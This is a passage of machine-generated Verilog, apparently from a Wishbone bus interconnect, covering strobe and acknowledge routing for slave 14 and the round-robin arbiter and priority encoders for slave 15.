    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd14 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd14 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd14 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd14 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd14 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd14 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd14 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd14 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_stb_o = ( ( ( m0_slv_sel == 4'd14 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s14_wb_stb_o = ( ( ( m1_slv_sel == 4'd14 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s14_wb_stb_o = ( ( ( m2_slv_sel == 4'd14 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s14_wb_stb_o = ( ( ( m3_slv_sel == 4'd14 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s14_wb_stb_o = ( ( ( m4_slv_sel == 4'd14 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s14_wb_stb_o = ( ( ( m5_slv_sel == 4'd14 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s14_wb_stb_o = ( ( ( m6_slv_sel == 4'd14 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s14_wb_stb_o = ( ( ( m7_slv_sel == 4'd14 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s14_m0_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s14_ack_i );
    assign s14_m1_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s14_ack_i );
    assign s14_m2_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s14_ack_i );
    assign s14_m3_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s14_ack_i );
    assign s14_m4_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s14_ack_i );
    assign s14_m5_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s14_ack_i );
    assign s14_m6_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s14_ack_i );
    assign s14_m7_ack_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s14_ack_i );
    assign s14_m0_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s14_err_i );
    assign s14_m1_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s14_err_i );
    assign s14_m2_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s14_err_i );
    assign s14_m3_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s14_err_i );
    assign s14_m4_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s14_err_i );
    assign s14_m5_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s14_err_i );
    assign s14_m6_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s14_err_i );
    assign s14_m7_err_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s14_err_i );
    assign s14_m0_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & s14_rty_i );
    assign s14_m1_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & s14_rty_i );
    assign s14_m2_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & s14_rty_i );
    assign s14_m3_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & s14_rty_i );
    assign s14_m4_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & s14_rty_i );
    assign s14_m5_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & s14_rty_i );
    assign s14_m6_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & s14_rty_i );
    assign s14_m7_rty_o = ( ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & s14_rty_i );
    assign s15_wb_data_i = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( { { ( rf_aw - 16 ) { 1'b0 }} , rf_rf_dout } ) : ( s15_data_i ) );
    assign s15_wb_ack_i = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( rf_rf_ack ) : ( s15_ack_i ) );
    assign s15_wb_err_i = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( 1'b0 ) : ( s15_err_i ) );
    assign s15_wb_rty_i = ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( 1'b0 ) : ( s15_rty_i ) );
    always @ (  posedge clk_i)
    begin
        s15_next <=  ~( s15_wb_cyc_o);
    end
    assign s15_arb_req = { m7_s15_cyc_o, m6_s15_cyc_o, m5_s15_cyc_o, m4_s15_cyc_o, m3_s15_cyc_o, m2_s15_cyc_o, m1_s15_cyc_o, m0_s15_cyc_o };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s15_arb_state <= s15_arb_grant0;
        end
        else
        begin 
            s15_arb_state <= s15_arb_next_state;
        end
    end
    always @ (  s15_arb_state or  { m7_s15_cyc_o, m6_s15_cyc_o, m5_s15_cyc_o, m4_s15_cyc_o, m3_s15_cyc_o, m2_s15_cyc_o, m1_s15_cyc_o, m0_s15_cyc_o } or  1'b0)
    begin
        s15_arb_next_state = s15_arb_state;
        case ( s15_arb_state ) 
        s15_arb_grant0:
        begin
            if (  !( s15_arb_req[0]) | 1'b0 ) 
            begin
                if ( s15_arb_req[1] ) 
                begin
                    s15_arb_next_state = s15_arb_grant1;
                end
                else
                begin 
                    if ( s15_arb_req[2] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant2;
                    end
                    else
                    begin 
                        if ( s15_arb_req[3] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant3;
                        end
                        else
                        begin 
                            if ( s15_arb_req[4] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant4;
                            end
                            else
                            begin 
                                if ( s15_arb_req[5] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant5;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[6] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[7] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant1:
        begin
            if (  !( s15_arb_req[1]) | 1'b0 ) 
            begin
                if ( s15_arb_req[2] ) 
                begin
                    s15_arb_next_state = s15_arb_grant2;
                end
                else
                begin 
                    if ( s15_arb_req[3] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant3;
                    end
                    else
                    begin 
                        if ( s15_arb_req[4] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant4;
                        end
                        else
                        begin 
                            if ( s15_arb_req[5] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant5;
                            end
                            else
                            begin 
                                if ( s15_arb_req[6] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant6;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[7] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[0] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant2:
        begin
            if (  !( s15_arb_req[2]) | 1'b0 ) 
            begin
                if ( s15_arb_req[3] ) 
                begin
                    s15_arb_next_state = s15_arb_grant3;
                end
                else
                begin 
                    if ( s15_arb_req[4] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant4;
                    end
                    else
                    begin 
                        if ( s15_arb_req[5] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant5;
                        end
                        else
                        begin 
                            if ( s15_arb_req[6] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant6;
                            end
                            else
                            begin 
                                if ( s15_arb_req[7] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant7;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[0] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[1] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant3:
        begin
            if (  !( s15_arb_req[3]) | 1'b0 ) 
            begin
                if ( s15_arb_req[4] ) 
                begin
                    s15_arb_next_state = s15_arb_grant4;
                end
                else
                begin 
                    if ( s15_arb_req[5] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant5;
                    end
                    else
                    begin 
                        if ( s15_arb_req[6] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant6;
                        end
                        else
                        begin 
                            if ( s15_arb_req[7] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant7;
                            end
                            else
                            begin 
                                if ( s15_arb_req[0] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant0;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[1] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[2] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant4:
        begin
            if (  !( s15_arb_req[4]) | 1'b0 ) 
            begin
                if ( s15_arb_req[5] ) 
                begin
                    s15_arb_next_state = s15_arb_grant5;
                end
                else
                begin 
                    if ( s15_arb_req[6] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant6;
                    end
                    else
                    begin 
                        if ( s15_arb_req[7] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant7;
                        end
                        else
                        begin 
                            if ( s15_arb_req[0] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant0;
                            end
                            else
                            begin 
                                if ( s15_arb_req[1] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant1;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[2] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[3] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant5:
        begin
            if (  !( s15_arb_req[5]) | 1'b0 ) 
            begin
                if ( s15_arb_req[6] ) 
                begin
                    s15_arb_next_state = s15_arb_grant6;
                end
                else
                begin 
                    if ( s15_arb_req[7] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant7;
                    end
                    else
                    begin 
                        if ( s15_arb_req[0] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant0;
                        end
                        else
                        begin 
                            if ( s15_arb_req[1] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant1;
                            end
                            else
                            begin 
                                if ( s15_arb_req[2] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant2;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[3] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[4] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant6:
        begin
            if (  !( s15_arb_req[6]) | 1'b0 ) 
            begin
                if ( s15_arb_req[7] ) 
                begin
                    s15_arb_next_state = s15_arb_grant7;
                end
                else
                begin 
                    if ( s15_arb_req[0] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant0;
                    end
                    else
                    begin 
                        if ( s15_arb_req[1] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant1;
                        end
                        else
                        begin 
                            if ( s15_arb_req[2] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant2;
                            end
                            else
                            begin 
                                if ( s15_arb_req[3] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant3;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[4] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[5] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s15_arb_grant7:
        begin
            if (  !( s15_arb_req[7]) | 1'b0 ) 
            begin
                if ( s15_arb_req[0] ) 
                begin
                    s15_arb_next_state = s15_arb_grant0;
                end
                else
                begin 
                    if ( s15_arb_req[1] ) 
                    begin
                        s15_arb_next_state = s15_arb_grant1;
                    end
                    else
                    begin 
                        if ( s15_arb_req[2] ) 
                        begin
                            s15_arb_next_state = s15_arb_grant2;
                        end
                        else
                        begin 
                            if ( s15_arb_req[3] ) 
                            begin
                                s15_arb_next_state = s15_arb_grant3;
                            end
                            else
                            begin 
                                if ( s15_arb_req[4] ) 
                                begin
                                    s15_arb_next_state = s15_arb_grant4;
                                end
                                else
                                begin 
                                    if ( s15_arb_req[5] ) 
                                    begin
                                        s15_arb_next_state = s15_arb_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s15_arb_req[6] ) 
                                        begin
                                            s15_arb_next_state = s15_arb_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s15_msel_req = { m7_s15_cyc_o, m6_s15_cyc_o, m5_s15_cyc_o, m4_s15_cyc_o, m3_s15_cyc_o, m2_s15_cyc_o, m1_s15_cyc_o, m0_s15_cyc_o };
    assign s15_msel_pri_enc_valid = { m7_s15_cyc_o, m6_s15_cyc_o, m5_s15_cyc_o, m4_s15_cyc_o, m3_s15_cyc_o, m2_s15_cyc_o, m1_s15_cyc_o, m0_s15_cyc_o };
    always @ (  s15_msel_pri_enc_valid[0] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[0]) ) 
        begin
            s15_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd0_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd0_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd0_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd0_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[0] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[0]) ) 
        begin
            s15_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[1] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[0] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd0_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd0_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[1] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[1]) ) 
        begin
            s15_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd1_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd1_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd1_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd1_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[1] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[1]) ) 
        begin
            s15_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[3] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[2] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd1_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd1_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[2] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[2]) ) 
        begin
            s15_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd2_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'h1 ) 
                begin
                    s15_msel_pri_enc_pd2_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'h2 ) 
                    begin
                        s15_msel_pri_enc_pd2_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s15_msel_pri_enc_pd2_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s15_msel_pri_enc_valid[2] or  { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) })
    begin
        if (  !( s15_msel_pri_enc_valid[2]) ) 
        begin
            s15_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s15_msel_pri_sel == 2'd2 ) ) ? ( rf_conf15[5] ) : ( 1'b0 ) ), ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf15[4] ) ) } == 2'h0 ) 
            begin
                s15_msel_pri_enc_pd2_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s15_msel_pri_enc_pd2_pri_out_d0 = 4'b0010;
            end
        end
    end
